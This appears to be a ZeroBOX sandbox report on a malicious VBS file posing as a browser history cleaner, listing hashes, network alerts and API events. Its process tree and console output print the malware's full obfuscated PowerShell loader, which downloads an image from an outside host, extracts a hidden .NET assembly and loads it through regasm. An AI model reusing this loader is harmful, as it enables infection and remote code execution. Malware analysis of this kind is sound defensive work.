Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 13, 2023, 10:55 a.m.	Nov. 13, 2023, 10:57 a.m.

Size	172.3KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`e5a6ec94e45fa3bb3f6076256ccf05a2`
SHA256	`7849c3a2a292f028d02bc5d7078a8f97e244a4054c59c4cf8bd8df592f069656`
CRC32	`7E195232`
ssdeep	`3072:KmRQ0YI33333k33333Q33333I33333X33333E33333033333Q33333d33333o0Q8:T33333k33333Q33333I33333X33333Ez`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLBrowserIEhistorycleaner.vbs
2556
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  2708
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STRINg]$verboSePrefeRenCe)[1,3]+'x'-join'')( ('N6zimageUrl = 9mBhttps://uploa'+'ddeimagen'+'s.com.br/images/004/654/536/original/new_image.'+'jpg?16989577509mB;N6zwebClient'+' = New-Object System.Net.WebClient;N6zimageBytes = N6zwebClient.DownloadData(N6zi'+'mageUrl);N6zimageText = [System.Text.Encoding]::UTF8.GetString(N6zimageBytes);N6zstartFlag = 9mB<<BASE64_START>>9mB;N6zendFlag = 9mB<<BASE64_END>>9mB;N6zstartInd'+'ex = N6zim'+'ageText.IndexOf(N6z'+'st'+'artFlag);N6zendIndex = N6zimageText.IndexOf(N6zendFlag);N6zstartIndex -ge 0 -and N6zendIndex -gt N6zstartIndex;N6zstartIndex'+' += N6z'+'startFlag.Le'+'ngth;N6zbase64Length = N6zendIndex - N6zstartIndex;N6zbase64Command = N6zimageText.Substring(N6zstartIndex, N6zbase'+'64Length);N6zcommandBytes = [System.Co'+'nvert]::Fr'+'omBase64String(N6zbase64Command'+');N6zloadedAssembly = [System.Reflection.Assembly]::Load(N6zcommandBytes);N6'+'ztype = N6zloade'+'dAssembly.GetT'+'ype(9mBFiber.Home9mB);N6zmethod = N6ztype.GetMethod(9mBVAI9mB).Inv'+'oke(N6znull, [object[]] (9mBdHh0LkNCTi8wNTIvMjMuOTQyLj'+'cyMS44ODEvLzpwdHRo9mB , 9mB9mB , 9mB29mB , 9mBregasm9mB , 9mB69mB , 9mBC:THfWindowsTHfTempTHf9mB, 9mBhtmlcvg9mB))').rePlACE('THf',[striNg][CHaR]92).rePlACE('N6z',[striNg][CHaR]36).rePlACE('9mB',[striNg][CHaR]39) )"
    2812

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.67.53.27
paste.ee	A 172.67.187.200 A 104.21.84.67	104.21.84.67
uploaddeimagens.com.br	A 104.21.45.138 A 172.67.215.45	104.21.45.138

IP Address	Status	Action
104.21.45.138	Active	Moloch
121.254.136.18	Active	Moloch
164.124.101.2	Active	Moloch
172.67.187.200	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49161 -> 172.67.187.200:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49161 -> 172.67.187.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 104.21.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49161 172.67.187.200:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=paste.ee	75:09:97:90:38:ad:dd:cc:0d:1b:d8:8b:02:ab:5d:a9:3b:7a:1f:1d
TLSv1 192.168.56.101:49166 104.21.45.138:443	C=US, O=Let's Encrypt, CN=E1	CN=uploaddeimagens.com.br	d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2023, 10:55 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 13, 2023, 10:55 a.m.			0	0
IsDebuggerPresent Nov. 13, 2023, 10:55 a.m.			0	0

Command line console output was observed (50 out of 140 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: annel." console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: At line:1 char:181 console_handle: 0x00000047	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/654/536/original/new_i console_handle: 0x00000053	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: mage.jpg?1698957750';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]:: console_handle: 0x0000006b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6 console_handle: 0x00000077	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In console_handle: 0x00000083	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000008f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im console_handle: 0x0000009b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]: console_handle: 0x000000a7	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly console_handle: 0x000000b3	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = console_handle: 0x000000bf	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkNCTi8wNTIvMjMuOTQyLjcyM console_handle: 0x000000cb	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: S44ODEvLzpwdHRo' , '' , '2' , 'regasm' , '6' , 'C:\Windows\Temp\', 'htmlcvg')) console_handle: 0x000000d7	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000e3	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000ef	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x0000010f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: Parameter name: bytes" console_handle: 0x0000011b	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: At line:1 char:244 console_handle: 0x00000127	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/654/536/original/new_i console_handle: 0x00000133	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: mage.jpg?1698957750';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000013f	1	1
WriteConsoleW Nov. 13, 2023, 10:55 a.m.	buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G console_handle: 0x0000014b	1	1
